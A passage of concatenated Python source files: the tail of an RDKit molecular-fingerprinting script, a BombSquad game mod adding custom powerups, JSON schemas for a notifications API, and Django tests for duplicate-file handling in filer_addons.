    if not details.idName:
      # default the id column to the table's first column
      details.idName = DbInfo.GetColumnNames(details.dbName, details.tableName)[0]
    dataSet = DataUtils.DBToData(details.dbName, details.tableName,
                                 what='%s,%s' % (details.idName, details.smilesName))
    idCol = 0
    smiCol = 1
  elif details.inFileName and details.useSmiles:
    # --- input from a delimited text file of SMILES ---
    from rdkit.ML.Data import DataUtils
    conn = None
    if not details.idName:
      details.idName = 'ID'
    try:
      dataSet = DataUtils.TextFileToData(details.inFileName,
                                         onlyCols=[details.idName, details.smilesName])
    except IOError:
      import traceback
      error('Problems reading from file %s\n' % (details.inFileName))
      traceback.print_exc()
    idCol = 0
    smiCol = 1
  elif details.inFileName and details.useSD:
    # --- input from an SD file; molecules are read eagerly into dataSet ---
    conn = None
    dataset = None  # NOTE(review): unused lowercase variant of dataSet; looks vestigial
    if not details.idName:
      details.idName = 'ID'
    dataSet = []
    try:
      s = Chem.SDMolSupplier(details.inFileName)
    except Exception:
      import traceback
      error('Problems reading from file %s\n' % (details.inFileName))
      traceback.print_exc()
    else:
      while 1:
        try:
          m = s.next()
        except StopIteration:
          break
        if m:
          dataSet.append(m)
          if reportFreq > 0 and not len(dataSet) % reportFreq:
            message('Read %d molecules\n' % (len(dataSet)))
            # NOTE(review): the maxMols cut-off is only evaluated on report
            # boundaries (it is nested under the reportFreq check) -- confirm
            # this is intended.
            if details.maxMols > 0 and len(dataSet) >= details.maxMols:
              break
      # re-key the list as (name, mol) pairs for FingerprintsFromMols
      for i, mol in enumerate(dataSet):
        if mol.HasProp(details.idName):
          nm = mol.GetProp(details.idName)
        else:
          nm = mol.GetProp('_Name')
        dataSet[i] = (nm, mol)
  else:
    dataSet = None
  fps = None
  if dataSet and not details.useSD:
    data = dataSet.GetNamedData()
    if not details.molPklName:
      fps = FingerprintsFromSmiles(data, idCol, smiCol, **details.__dict__)
    else:
      # NOTE(review): the pickle column index is passed via the smiCol
      # variable here (it holds column 1 either way) -- naming only.
      fps = FingerprintsFromPickles(data, idCol, smiCol, **details.__dict__)
  elif dataSet and details.useSD:
    fps = FingerprintsFromMols(dataSet, **details.__dict__)
  if fps:
    if details.outFileName:
      # pickle one (ID, fp) tuple per molecule
      outF = open(details.outFileName, 'wb+')
      for i in range(len(fps)):
        pickle.dump(fps[i], outF)
      outF.close()
    dbName = details.outDbName or details.dbName
    if details.outTableName and dbName:
      from rdkit.Dbase.DbConnection import DbConnect
      from rdkit.Dbase import DbUtils, DbModule
      conn = DbConnect(dbName)
      #
      # We don't have a db open already, so we'll need to figure out
      # the types of our columns...
      #
      colTypes = DbUtils.TypeFinder(data, len(data), len(data[0]))
      typeStrs = DbUtils.GetTypeStrings([details.idName, details.smilesName], colTypes,
                                        keyCol=details.idName)
      cols = '%s, %s %s' % (typeStrs[0], details.fpColName, DbModule.binaryTypeName)
      # FIX: we should really check to see if the table
      # is already there and, if so, add the appropriate
      # column.
      #
      # create the new table
      #
      if details.replaceTable or \
         details.outTableName.upper() not in [x.upper() for x in conn.GetTableNames()]:
        conn.AddTable(details.outTableName, cols)
      #
      # And add the data
      #
      for ID, fp in fps:
        tpl = ID, DbModule.binaryHolder(fp.ToBinary())
        conn.InsertData(details.outTableName, tpl)
      conn.Commit()
  return fps
# ------------------------------------------------
#
# Command line parsing stuff
#
# ------------------------------------------------
class FingerprinterDetails(object):
  """Container for the parameters of a fingerprinting run.

  Construction populates sensible defaults for the fingerprinter itself,
  for database screening, and for clustering.
  """

  def __init__(self):
    self._fingerprinterInit()
    self._screenerInit()
    self._clusterInit()

  def _fingerprinterInit(self):
    """Defaults for fingerprint generation and input/output locations."""
    self.fingerprinter = Chem.RDKFingerprint
    self.fpColName = "AutoFragmentFP"
    # input/output locations
    self.idName = ''
    self.dbName = ''
    self.outDbName = ''
    self.tableName = ''
    self.smilesName = 'SMILES'
    self.maxMols = -1
    self.outFileName = ''
    self.outTableName = ''
    self.inFileName = ''
    self.replaceTable = True
    self.molPklName = ''
    self.useSmiles = True
    self.useSD = False
    # fingerprint parameters
    self.minSize = 64
    self.fpSize = 2048
    self.tgtDensity = 0.3
    self.minPath = 1
    self.maxPath = 7
    self.discrimHash = 0
    self.useHs = 0
    self.useValence = 0
    self.bitsPerHash = 2

  def _screenerInit(self):
    """Defaults for similarity screening."""
    self.metric = DataStructs.TanimotoSimilarity
    self.doScreen = ''
    self.topN = 10
    self.screenThresh = 0.75
    self.doThreshold = 0
    self.smilesTableName = ''
    self.probeSmiles = ''
    self.probeMol = None
    self.noPickle = 0

  def _clusterInit(self):
    """Defaults for clustering."""
    self.clusterAlgo = Murtagh.WARDS
    self.actTableName = ''
    self.actName = ''

  def GetMetricName(self):
    """Return a human-readable name for the current similarity metric."""
    known = {
      DataStructs.TanimotoSimilarity: 'Tanimoto',
      DataStructs.DiceSimilarity: 'Dice',
      DataStructs.CosineSimilarity: 'Cosine',
    }
    if self.metric in known:
      return known[self.metric]
    if self.metric:
      # unrecognized but set: hand the raw metric back
      return self.metric
    return 'Unknown'

  def SetMetricFromName(self, name):
    """Set the metric from a case-insensitive name; unknown names are ignored."""
    known = {
      'TANIMOTO': DataStructs.TanimotoSimilarity,
      'DICE': DataStructs.DiceSimilarity,
      'COSINE': DataStructs.CosineSimilarity,
    }
    metric = known.get(name.upper())
    if metric is not None:
      self.metric = metric
def Usage():
  """Print the module usage message and abort with a nonzero status."""
  print(_usageDoc)
  raise SystemExit(-1)
_usageDoc = """
Usage: FingerprintMols.py [args] <fName>
If <fName> is provided and no tableName is specified (see below),
data will be read from the text file <fName>. Text files delimited
with either commas (extension .csv) or tabs (extension .txt) are
supported.
Command line arguments are:
- -d _dbName_: set the name of the database from which
to pull input molecule information. If output is
going to a database, this will also be used for that
unless the --outDbName option is used.
- -t _tableName_: set the name of the database table
from which to pull input molecule information
- --smilesName=val: sets the name of the SMILES column
in the input database. Default is *SMILES*.
- --useSD: Assume that the input file is an SD file, not a SMILES
table.
- --idName=val: sets the name of the id column in the input
database. Defaults to be the name of the first db column
(or *ID* for text files).
- -o _outFileName_: name of the output file (output will
be a pickle file with one label,fingerprint entry for each
molecule).
- --outTable=val: name of the output db table used to store
fingerprints. If this table already exists, it will be
replaced.
- --outDbName: name of output database, if it's being used.
Defaults to be the same as the input db.
- --fpColName=val: name to use for the column which stores
fingerprints (in pickled format) in the output db table.
Default is *AutoFragmentFP*
- --maxSize=val: base size of the fingerprints to be generated
Default is *2048*
- --minSize=val: minimum size of the fingerprints to be generated
(limits the amount of folding that happens). Default is *64*
- --density=val: target bit density in the fingerprint. The
fingerprint will be folded until this density is
reached. Default is *0.3*
- --minPath=val: minimum path length to be included in
fragment-based fingerprints. Default is *1*.
- --maxPath=val: maximum path length to be included in
fragment-based fingerprints. Default is *7*.
- --nBitsPerHash: number of bits to be set in the output
fingerprint for each fragment. Default is *2*.
- --discrim: use of path-based discriminators to hash bits.
Default is *false*.
- -V: include valence information in the fingerprints
Default is *false*.
- -H: include Hs in the fingerprint
Default is *false*.
- --maxMols=val: sets the maximum number of molecules to be
fingerprinted.
- --useMACCS: use the public MACCS keys to do the fingerprinting
(instead of a daylight-type fingerprint)
"""
def ParseArgs(details=None):
  """ parses the command line arguments and returns a
  _FingerprinterDetails_ instance with the results.
  **Note**:
    - If you make modifications here, please update the global
      _usageDoc string so the Usage message is up to date.
    - This routine is used by both the fingerprinter, the clusterer and the
      screener; not all arguments make sense for all applications.
  """
  args = sys.argv[1:]
  try:
    args, extras = getopt.getopt(args,
                                 'HVs:d:t:o:h',
                                 [
                                   'minSize=',
                                   'maxSize=',
                                   'density=',
                                   'minPath=',
                                   'maxPath=',
                                   'bitsPerHash=',
                                   # bug fix: --nBitsPerHash is the spelling
                                   # documented in _usageDoc and handled below,
                                   # but it was never registered with getopt,
                                   # so using it always aborted via Usage().
                                   # Both spellings are accepted now.
                                   'nBitsPerHash=',
                                   'smilesName=',
                                   'molPkl=',
                                   'useSD',
                                   'idName=',
                                   'discrim',
                                   'outTable=',
                                   'outDbName=',
                                   'fpColName=',
                                   'maxMols=',
                                   'useMACCS',
                                   'keepTable',
                                   # SCREENING:
                                   'smilesTable=',
                                   'doScreen=',
                                   'topN=',
                                   'thresh=',
                                   'smiles=',
                                   'dice',
                                   'cosine',
                                   # CLUSTERING:
                                   'actTable=',
                                   'actName=',
                                   'SLINK',
                                   'CLINK',
                                   'UPGMA',
                                 ])
  except Exception:
    import traceback
    traceback.print_exc()
    Usage()
  if details is None:
    details = FingerprinterDetails()
  if len(extras):
    # first positional argument is the input file name
    details.inFileName = extras[0]
  for arg, val in args:
    if arg == '-H':
      details.useHs = 1
    elif arg == '-V':
      details.useValence = 1
    elif arg == '-d':
      details.dbName = val
    elif arg == '-t':
      details.tableName = val
    elif arg == '-o':
      details.outFileName = val
    elif arg == '--minSize':
      details.minSize = int(val)
    elif arg == '--maxSize':
      details.fpSize = int(val)
    elif arg == '--density':
      details.tgtDensity = float(val)
    elif arg == '--outTable':
      details.outTableName = val
    elif arg == '--outDbName':
      details.outDbName = val
    elif arg == '--fpColName':
      details.fpColName = val
    elif arg == '--minPath':
      details.minPath = int(val)
    elif arg == '--maxPath':
      details.maxPath = int(val)
    elif arg in ('--nBitsPerHash', '--bitsPerHash'):
      # accept both the documented and the previously-registered spelling
      details.bitsPerHash = int(val)
    elif arg == '--discrim':
      details.discrimHash = 1
    elif arg == '--smilesName':
      details.smilesName = val
    elif arg == '--molPkl':
      details.molPklName = val
    elif arg == '--useSD':
      details.useSmiles = False
      details.useSD = True
    elif arg == '--idName':
      details.idName = val
    elif arg == '--maxMols':
      details.maxMols = int(val)
    elif arg == '--useMACCS':
      details.fingerprinter = MACCSkeys.GenMACCSKeys
    elif arg == '--keepTable':
      details.replaceTable = False
    # SCREENER:
    elif arg == '--smilesTable':
      details.smilesTableName = val
    elif arg == '--topN':
      details.doThreshold = 0
      details.topN = int(val)
    elif arg == '--thresh':
      details.doThreshold = 1
      details.screenThresh = float(val)
    elif arg == '--smiles':
      details.probeSmiles = val
    elif arg == '--dice':
      details.metric = DataStructs.DiceSimilarity
    elif arg == '--cosine':
      details.metric = DataStructs.CosineSimilarity
    # CLUSTERS:
    elif arg == '--SLINK':
      details.clusterAlgo = Murtagh.SLINK
    elif arg == '--CLINK':
      details.clusterAlgo = Murtagh.CLINK
    elif arg == '--UPGMA':
      details.clusterAlgo = Murtagh.UPGMA
    elif arg == '--actTable':
      details.actTableName = val
    elif arg == '--actName':
      details.actName = val
    elif arg == '-h':
      Usage()
  return details
if __name__ == '__main__':
  # command line entry point: parse the arguments and run the fingerprinter
  message("This is FingerprintMols\n\n")
  details = ParseArgs()
  FingerprintsFromDetails(details)
|
|
import bs
import random
#add for bunny buddy:
import BuddyBunny
import SnoBallz
import bsPowerup
import bsSpaz
import Portal
from bsPowerup import PowerupMessage, PowerupAcceptMessage, _TouchedMessage, PowerupFactory, Powerup
# Lifetime of a powerup box in milliseconds; NewPowerup starts flashing
# 2500ms before expiry and dies 1000ms before this interval elapses.
defaultPowerupInterval = 8000
class NewPowerupFactory(PowerupFactory):
    """PowerupFactory variant that adds the media and materials for the
    custom powerups shipped with this mod (bunny buddy, snowballs, portals).
    """

    def __init__(self):
        self._lastPowerupType = None
        self.model = bs.getModel("powerup")
        self.modelSimple = bs.getModel("powerupSimple")
        self.texBomb = bs.getTexture("powerupBomb")
        self.texPunch = bs.getTexture("powerupPunch")
        self.texIceBombs = bs.getTexture("powerupIceBombs")
        self.texStickyBombs = bs.getTexture("powerupStickyBombs")
        self.texShield = bs.getTexture("powerupShield")
        self.texImpactBombs = bs.getTexture("powerupImpactBombs")
        self.texHealth = bs.getTexture("powerupHealth")
        self.texLandMines = bs.getTexture("powerupLandMines")
        self.texCurse = bs.getTexture("powerupCurse")
        #Add for Bunnybot:
        self.eggModel = bs.getModel('egg')
        self.texEgg = bs.getTexture('eggTex1')
        #Add for snoBalls:
        self.texSno = bs.getTexture("bunnyColor") #Bunny is most uniform plain white color.
        self.snoModel = bs.getModel("frostyPelvis") #Frosty pelvis is very nice and round...
        self.healthPowerupSound = bs.getSound("healthPowerup")
        self.powerupSound = bs.getSound("powerup01")
        self.powerdownSound = bs.getSound("powerdown01")
        self.dropSound = bs.getSound("boxDrop")
        self.texPort = bs.getTexture("ouyaOButton")
        # material for powerups
        self.powerupMaterial = bs.Material()
        # material for anyone wanting to accept powerups
        self.powerupAcceptMaterial = bs.Material()
        # pass a powerup-touched message to applicable stuff
        # NOTE(review): the doubled parens around the condition do not create
        # a nested tuple -- this is a single condition, kept as-is.
        self.powerupMaterial.addActions(
            conditions=(("theyHaveMaterial",self.powerupAcceptMaterial)),
            actions=(("modifyPartCollision","collide",True),
                     ("modifyPartCollision","physical",False),
                     ("message","ourNode","atConnect",_TouchedMessage())))
        # we dont wanna be picked up
        self.powerupMaterial.addActions(
            conditions=("theyHaveMaterial",bs.getSharedObject('pickupMaterial')),
            actions=( ("modifyPartCollision","collide",False)))
        self.powerupMaterial.addActions(
            conditions=("theyHaveMaterial",bs.getSharedObject('footingMaterial')),
            actions=(("impactSound",self.dropSound,0.5,0.1)))
        # flattened (type repeated `freq` times) distribution for random picks
        self._powerupDist = []
        for p,freq in getDefaultPowerupDistribution():
            for i in range(int(freq)):
                self._powerupDist.append(p)

    def getRandomPowerupType(self, forceType=None, excludeTypes=None):
        """Pick a random powerup type, honoring forceType/excludeTypes.

        Bug fix: the original appended to the caller-supplied excludeTypes
        list in place, so a caller reusing its list saw it grow with
        'snoball'/'bunny' on every call; we now work on a copy.
        """
        if excludeTypes:
            # exclude custom powerups if there is some custom powerup logic
            # example: bsFootball.py:456
            excludeTypes = list(excludeTypes) + ['snoball', 'bunny']
        else:
            excludeTypes = []
        return PowerupFactory.getRandomPowerupType(self, forceType, excludeTypes)
def getDefaultPowerupDistribution():
    """Return the default (powerupType, relativeFrequency) pairs.

    A higher frequency makes the factory's random selection pick that
    powerup type more often.
    """
    distribution = [
        ('tripleBombs', 3),
        ('iceBombs', 3),
        ('punch', 3),
        ('impactBombs', 3),
        ('landMines', 2),
        ('stickyBombs', 3),
        ('shield', 2),
        ('health', 1),
        ('bunny', 2),
        ('portal', 2),
        ('curse', 1),
        ('snoball', 3),
    ]
    return tuple(distribution)
class NewPowerup(Powerup):
    # Powerup variant that adds the custom 'bunny', 'snoball' and 'portal'
    # types on top of the stock bsPowerup.Powerup behaviour.
    def __init__(self,position=(0,1,0),powerupType='tripleBombs',expire=True):
        """
        Create a powerup-box of the requested type at the requested position.
        see bs.Powerup.powerupType for valid type strings.
        """
        bs.Actor.__init__(self)
        factory = self.getFactory()
        self.powerupType = powerupType;
        # set once the powerup is consumed so it is only granted once
        self._powersGiven = False
        mod = factory.model
        mScl = 1
        # pick the texture (and, for custom types, model/scale) per type
        if powerupType == 'tripleBombs': tex = factory.texBomb
        elif powerupType == 'punch': tex = factory.texPunch
        elif powerupType == 'iceBombs': tex = factory.texIceBombs
        elif powerupType == 'impactBombs': tex = factory.texImpactBombs
        elif powerupType == 'landMines': tex = factory.texLandMines
        elif powerupType == 'stickyBombs': tex = factory.texStickyBombs
        elif powerupType == 'shield': tex = factory.texShield
        elif powerupType == 'health': tex = factory.texHealth
        elif powerupType == 'curse': tex = factory.texCurse
        elif powerupType == 'portal': tex = factory.texPort
        elif powerupType == 'bunny':
            tex = factory.texEgg
            mod = factory.eggModel
            mScl = 0.7
        elif powerupType == 'snoball':
            tex = factory.texSno
            mod = factory.snoModel
        else: raise Exception("invalid powerupType: "+str(powerupType))
        if len(position) != 3: raise Exception("expected 3 floats for position")
        self.node = bs.newNode('prop',
                               delegate=self,
                               attrs={'body':'box',
                                      'position':position,
                                      'model':mod,
                                      'lightModel':factory.modelSimple,
                                      'shadowSize':0.5,
                                      'colorTexture':tex,
                                      'reflection':'powerup',
                                      'reflectionScale':[1.0],
                                      'materials':(factory.powerupMaterial,bs.getSharedObject('objectMaterial'))})
        # animate in..
        curve = bs.animate(self.node,"modelScale",{0:0,140:1.6,200:mScl})
        bs.gameTimer(200,curve.delete)
        if expire:
            # start flashing 2.5s before expiry, die 1s before the interval ends
            bs.gameTimer(defaultPowerupInterval-2500,bs.WeakCall(self._startFlashing))
            bs.gameTimer(defaultPowerupInterval-1000,bs.WeakCall(self.handleMessage,bs.DieMessage()))
    def delpor(self):
        # tear down the portal spawned when a 'portal' powerup was picked up
        Portal.currentnum -= 1
        self.port.delete()
    def handleMessage(self,m):
        # Dispatch game messages; custom types are handled here instead of
        # being forwarded to the spaz via PowerupMessage.
        self._handleMessageSanityCheck()
        if isinstance(m,PowerupAcceptMessage):
            # a spaz accepted the powerup: play feedback and expire the box
            factory = self.getFactory()
            if self.powerupType == 'health':
                bs.playSound(factory.healthPowerupSound,3,position=self.node.position)
            bs.playSound(factory.powerupSound,3,position=self.node.position)
            self._powersGiven = True
            self.handleMessage(bs.DieMessage())
        elif isinstance(m,_TouchedMessage):
            if not self._powersGiven:
                node = bs.getCollisionInfo("opposingNode")
                if node is not None and node.exists():
                    #We won't tell the spaz about the bunny. It'll just happen.
                    if self.powerupType == 'bunny':
                        p=node.getDelegate().getPlayer()
                        if 'bunnies' not in p.gameData:
                            p.gameData['bunnies'] = BuddyBunny.BunnyBotSet(p)
                        p.gameData['bunnies'].doBunny()
                        self._powersGiven = True
                        self.handleMessage(bs.DieMessage())
                    #a Spaz doesn't know what to do with a snoball powerup. All the snowball functionality
                    #is handled through SnoBallz.py to minimize modifications to the original game files
                    elif self.powerupType == 'snoball':
                        spaz=node.getDelegate()
                        SnoBallz.snoBall().getFactory().giveBallz(spaz)
                        self._powersGiven = True
                        self.handleMessage(bs.DieMessage())
                    elif self.powerupType == 'portal':
                        # portals live for the standard powerup wear-off time
                        t = bsSpaz.gPowerupWearOffTime
                        if Portal.currentnum < Portal.maxportals :
                            Portal.currentnum += 1
                            if self.node.position in Portal.lastpos :
                                self.port = Portal.Portal(position1 = None,r = 0.9,color = (random.random(),random.random(),random.random()),activity = bs.getActivity())
                                bs.gameTimer(t,bs.Call(self.delpor))
                            else :
                                # NOTE(review): rebinding ``m`` here shadows the
                                # message argument; harmless today since ``m`` is
                                # not read again afterwards, but fragile.
                                m = self.node.position
                                Portal.lastpos.append(m)
                                self.port = Portal.Portal(position1 = self.node.position,r = 0.9,color = (random.random(),random.random(),random.random()),activity = bs.getActivity())
                                bs.gameTimer(t,bs.Call(self.delpor))
                        self._powersGiven = True
                        self.handleMessage(bs.DieMessage())
                    else:
                        # stock types: let the spaz apply the powerup itself
                        node.handleMessage(PowerupMessage(self.powerupType,sourceNode=self.node))
        elif isinstance(m,bs.DieMessage):
            if self.node.exists():
                if (m.immediate):
                    self.node.delete()
                else:
                    # shrink out over 100ms, then remove the node
                    curve = bs.animate(self.node,"modelScale",{0:1,100:0})
                    bs.gameTimer(100,self.node.delete)
        elif isinstance(m,bs.OutOfBoundsMessage):
            self.handleMessage(bs.DieMessage())
        elif isinstance(m,bs.HitMessage):
            # dont die on punches (thats annoying)
            if m.hitType != 'punch':
                self.handleMessage(bs.DieMessage())
        else:
            bs.Actor.handleMessage(self,m)
# Monkey-patch the stock powerup classes so the game uses the extended
# factory/powerup implementations defined above.
bsPowerup.PowerupFactory = NewPowerupFactory
bsPowerup.Powerup = NewPowerup
|
|
from integration_test.schemas.v2.definitions import personalisation, uuid
# JSON Schema (draft-04) definitions for the v2 notifications API.

# Embedded template stub returned inside notification responses.
template = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "template schema",
    "type": "object",
    "title": "notification content",
    "properties": {
        "id": uuid,
        "version": {"type": "integer"},
        "uri": {"type": "string"}
    },
    "required": ["id", "version", "uri"]
}
# Schema for GET /v2/notifications/<id>.
get_notification_response = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "GET notification response schema",
    "type": "object",
    "title": "response v2/notification",
    "properties": {
        "id": uuid,
        "reference": {"type": ["string", "null"]},
        "email_address": {"type": ["string", "null"]},
        "phone_number": {"type": ["string", "null"]},
        "line_1": {"type": ["string", "null"]},
        "line_2": {"type": ["string", "null"]},
        "line_3": {"type": ["string", "null"]},
        "line_4": {"type": ["string", "null"]},
        "line_5": {"type": ["string", "null"]},
        "line_6": {"type": ["string", "null"]},
        "postcode": {"type": ["string", "null"]},
        "postage": {"enum": ["first", "second", None]},
        "type": {"enum": ["sms", "letter", "email"]},
        "status": {"type": "string"},
        "template": template,
        "body": {"type": "string"},
        "subject": {"type": ["string", "null"]},
        "created_at": {"type": "string"},
        "sent_at": {"type": ["string", "null"]},
        "completed_at": {"type": ["string", "null"]},
        "created_by_name": {"type": ["string", "null"]}
    },
    "required": [
        # technically, all keys are required since we always have all of them
        "id", "reference", "email_address", "phone_number",
        "line_1", "line_2", "line_3", "line_4", "line_5", "line_6", "postcode",
        "type", "status", "template", "body", "created_at", "sent_at", "completed_at"
    ]
}
# Schema for GET /v2/notifications (paginated list).
get_notifications_response = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "GET list of notifications response schema",
    "type": "object",
    "properties": {
        "notifications": {
            "type": "array",
            "items": {
                "type": "object",
                # NOTE(review): "ref" is not a JSON-Schema keyword (draft-04
                # uses "$ref" or direct embedding), so items are effectively
                # only checked to be objects -- confirm intent.
                "ref": get_notification_response
            }
        },
        "links": {
            "type": "object",
            "properties": {
                "current": {
                    "type": "string"
                },
                "next": {
                    "type": "string"
                }
            },
            "additionalProperties": False,
            "required": ["current"]
        }
    },
    "additionalProperties": False,
    "required": ["notifications", "links"]
}
# Request schema for POST /v2/notifications/sms.
post_sms_request = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST sms notification schema",
    "type": "object",
    "title": "POST v2/notifications/sms",
    "properties": {
        "reference": {"type": "string"},
        "phone_number": {"type": "string", "format": "phone_number"},
        "template_id": uuid,
        "sms_sender_id": uuid,
        "personalisation": personalisation
    },
    "required": ["phone_number", "template_id"]
}
# "content" sub-schema embedded in the SMS response.
sms_content = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "content schema for SMS notification response schema",
    "type": "object",
    "title": "notification content",
    "properties": {
        "body": {"type": "string"},
        "from_number": {"type": ["string", "null"]}
    },
    "required": ["body"]
}
# Response schema for POST /v2/notifications/sms.
post_sms_response = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST sms notification response schema",
    "type": "object",
    "title": "response v2/notifications/sms",
    "properties": {
        "id": uuid,
        "reference": {"type": ["string", "null"]},
        "content": sms_content,
        "uri": {"type": "string"},
        "template": template
    },
    "required": ["id", "content", "uri", "template"]
}
# Request schema for POST /v2/notifications/email.
post_email_request = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST email notification schema",
    "type": "object",
    "title": "POST v2/notifications/email",
    "properties": {
        "reference": {"type": "string"},
        "email_address": {"type": "string", "format": "email_address"},
        "template_id": uuid,
        "email_reply_to_id": uuid,
        "personalisation": personalisation
    },
    "required": ["email_address", "template_id"]
}
# "content" sub-schema embedded in the email response.
email_content = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "Email content for POST email notification",
    "type": "object",
    "title": "notification email content",
    "properties": {
        "from_email": {"type": "string", "format": "email_address"},
        "body": {"type": "string"},
        "subject": {"type": "string"}
    },
    "required": ["body", "from_email", "subject"]
}
# Response schema for POST /v2/notifications/email.
post_email_response = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST email notification response schema",
    "type": "object",
    "title": "response v2/notifications/email",
    "properties": {
        "id": uuid,
        "reference": {"type": ["string", "null"]},
        "content": email_content,
        "uri": {"type": "string"},
        "template": template
    },
    "required": ["id", "content", "uri", "template"]
}
# Request schema for POST /v2/notifications/letter.
post_letter_request = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST letter notification schema",
    "type": "object",
    "title": "POST v2/notifications/letter",
    "properties": {
        "reference": {"type": "string"},
        "template_id": uuid,
        "personalisation": personalisation
    },
    # NOTE(review): "letter_address" is required here but is not declared
    # under "properties" above -- looks inconsistent; confirm against the API.
    "required": ["letter_address", "template_id"]
}
# "content" sub-schema embedded in the letter response.
letter_content = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "Letter content for POST letter notification",
    "type": "object",
    "title": "notification letter content",
    "properties": {
        "body": {"type": ["string", "null"]},
        "subject": {"type": "string"}
    },
    "required": ["body", "subject"]
}
# Response schema for POST /v2/notifications/letter.
post_letter_response = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST letter notification response schema",
    "type": "object",
    "title": "response v2/notifications/letter",
    "properties": {
        "id": uuid,
        "reference": {"type": ["string", "null"]},
        "content": letter_content,
        "uri": {"type": "string"},
        "template": template
    },
    "required": ["id", "content", "uri", "template"]
}
# Response schema for POST of a precompiled (PDF) letter.
post_precompiled_letter_response = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "description": "POST letter notification response schema",
    "type": "object",
    "title": "response v2/notifications/letter",
    "properties": {
        "id": uuid,
        "reference": {"type": ["string", "null"]},
        "postage": {"enum": ["first", "second", None]}
    },
    "required": ["id", "reference"]
}
def create_post_sms_response_from_notification(notification, body, from_number, url_root):
    """Assemble the v2 POST /notifications/sms response payload for *notification*."""
    notification_uri = "{}/v2/notifications/{}".format(url_root, str(notification.id))
    return {
        "id": notification.id,
        "reference": notification.client_reference,
        "content": {"body": body, "from_number": from_number},
        "uri": notification_uri,
        "template": __create_template_from_notification(notification=notification,
                                                        url_root=url_root)
    }
def create_post_email_response_from_notification(notification, content, subject, email_from, url_root):
    """Assemble the v2 POST /notifications/email response payload for *notification*."""
    notification_uri = "{}/v2/notifications/{}".format(url_root, str(notification.id))
    email_body = {
        "from_email": email_from,
        "body": content,
        "subject": subject
    }
    return {
        "id": notification.id,
        "reference": notification.client_reference,
        "content": email_body,
        "uri": notification_uri,
        "template": __create_template_from_notification(notification=notification,
                                                        url_root=url_root)
    }
def __create_template_from_notification(notification, url_root):
    """Build the embedded template stub (id/version/uri) for a notification response."""
    template_uri = "{}/v2/templates/{}".format(url_root, str(notification.template_id))
    return {
        "id": notification.template_id,
        "version": notification.template_version,
        "uri": template_uri
    }
|
|
# -*- coding: utf-8 -*-
from django.test import TestCase, override_settings, modify_settings
from filer.tests import create_superuser
from filer.models import File, Folder
from filer_addons.tests.utils import create_django_file
from filer_addons.filer_signals import conf as signals_conf
# ``reload`` is a builtin on Python 2 but lives in importlib on Python 3;
# the tests below re-import the signals conf module after settings overrides.
try:
    reload
except NameError:
    from importlib import reload
# Presets for FILER_ADDONS_DUPLICATE_HANDLING used by the tests below.
# Duplicate handling switched off entirely.
DUPLICATE_HANDLING_DISABLED = {
    'prevent': False,
}
# Detect duplicates across all folders and filenames; 'created_only' True
# presumably restricts handling to newly created files -- see the
# "greedy" tests below.
DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES = {
    'prevent': True,
    'created_only': True,
    'same_folder_required': False,
    'same_filename_required': False,
}
# "Greedy" variant: duplicates that already existed are handled as well.
DUPLICATE_HANDLING_ALL_FOLDERS_ALL_FILES_WITH_EXISTING = {
    'prevent': True,
    'created_only': False,
    'same_folder_required': False,
    'same_filename_required': False,
}
@modify_settings(INSTALLED_APPS={
    'append': 'filer_addons.filer_signals',
})
class DuplicatesTests(TestCase):
    """Integration tests for filer_signals duplicate handling.

    The signal handlers read their configuration at import time, so each
    test that overrides FILER_ADDONS_DUPLICATE_HANDLING re-imports the
    conf module via ``reload``.

    Fix: the deprecated ``assertEquals`` alias (removed in Python 3.12)
    has been replaced with ``assertEqual`` throughout.
    """

    def setUp(self):
        reload(signals_conf)
        self.superuser = create_superuser()
        self.client.login(username='admin', password='secret')
        # NOTE(review): both folders share the name 'test'; the tests compare
        # folder objects rather than names, so this appears intentional.
        self.folder = Folder.objects.create(name='test')
        self.another_folder = Folder.objects.create(name='test')

    def tearDown(self):
        self.delete_files()
        for folder in Folder.objects.all():
            folder.delete()

    def delete_files(self):
        """Delete every filer File object (and its underlying storage file)."""
        for f in File.objects.all():
            f.delete()

    def create_two_files(self, duplicates=True, **kwargs):
        """
        two files
        without args: duplicates, in "unfiled files"
        kwargs different_folder: second file in self.another_folder
        kwargs different_name: second file filename = file2.jpg
        :param duplicates:
        :param kwargs:
        :return:
        """
        size = (50, 50, )
        size2 = (20, 20, )
        if duplicates:
            # identical dimensions produce identical file content
            size2 = size
        folder = kwargs.get('folder', None)
        if kwargs.get('different_folder', None):
            folder2 = self.another_folder
        else:
            folder2 = folder
        filename = 'file1.jpg'
        if kwargs.get('different_name', None):
            filename2 = 'file2.jpg'
        else:
            filename2 = filename
        django_file1 = create_django_file(filename=filename, size=size)
        django_file2 = create_django_file(filename=filename2, size=size2)
        file_obj = File.objects.create(
            owner=self.superuser,
            original_filename=filename,
            file=django_file1,
            folder=folder,
        )
        file_obj.save()
        file_obj2 = File.objects.create(
            owner=self.superuser,
            original_filename=filename2,
            file=django_file2,
            folder=folder2,
        )
        file_obj2.save()

    def test_no_duplicates(self):
        # first, no duplicates
        self.create_two_files(duplicates=False)
        self.assertEqual(File.objects.all().count(), 2)
        # now, there are duplicates!
        self.create_two_files(duplicates=False)
        self.assertEqual(File.objects.all().count(), 2)

    def test_has_duplicate_no_folder(self):
        """
        same filename, same (none) folder
        :return:
        """
        self.create_two_files(duplicates=True)
        self.assertEqual(File.objects.all().count(), 1)
        # same again, dups!
        self.create_two_files(duplicates=True)
        self.assertEqual(File.objects.all().count(), 1)

    def test_no_duplicate_different_folder(self):
        """
        same filename, different folder => no duplicate with default settings!
        :return:
        """
        self.create_two_files(duplicates=True, different_folder=True)
        self.assertEqual(File.objects.all().count(), 2)
        # same again, dups!
        self.create_two_files(duplicates=True, different_folder=True)
